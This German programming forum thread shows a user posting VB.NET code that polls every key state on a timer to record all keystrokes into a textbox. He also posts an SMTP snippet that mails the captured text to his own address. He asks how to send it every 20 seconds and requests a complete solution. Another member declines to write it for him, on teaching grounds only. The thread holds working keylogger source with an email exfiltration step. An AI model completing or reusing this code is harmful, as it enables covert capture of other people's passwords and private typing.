VB08: Wie stelle ich ein, dass nach 20 Sekunden eine Mail mit der Textbox1 gesende..?

MetalJulien

Grünschnabel
Hi, ich habe folgenden Code: Nun, wie bringe ich es her, dass der Befehl
Code:
 Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
        myClient.Credentials = New NetworkCredential("EMAILADRESSE", "Passwort")
        myClient.Send("*EMAILADRESSE", "rsm*EMAILADRESSE, *EMAILADRESSE", "Daten", TextBox1.Text)
im unteren Code nach 20 Sekunden ausgeführt wird? (Es schreibt die Daten, die man auf dme Computer schreibt in die Textbox und es sollte nach 20 Sekunden diese Tasten per mail an mich senden, nur wie?)

Code:
Imports System.Net
Imports System.Net.Mail
Public Class Form1
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
    Dim Asciicode As Integer
    Dim Taste As Integer


    Private Sub MaskedTextBox1_MaskInputRejected(ByVal sender As System.Object, ByVal e As System.Windows.Forms.MaskInputRejectedEventArgs) Handles MaskedTextBox1.MaskInputRejected

    End Sub

    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick


        For i = 1 To 255
            Taste = GetAsyncKeyState(i)
            If Taste = -32767 Then

                Me.MaskedTextBox1.Text = Me.MaskedTextBox1.Text & Chr(i)

            End If

        Next
    End Sub

End Class
 

MetalJulien

Grünschnabel
Wäre es möglich, dass du mir den code so schreibst, wie er fertig wäre? Ich habe keine Ahnung was du jetzt damit meinst, IF Thread..... Dann die EMail funktuion`? Bitte eine komplette Lösung :D Gruss
 

Muepe32

Erfahrenes Mitglied
Es wird hier eigentlich nur ungern mit fertigen Lösungen um sich geworfen, hier soll man was lernen und nicht einfach abschreiben.

Hast du dir die Dokumentation der Funktion mal durchgelesen?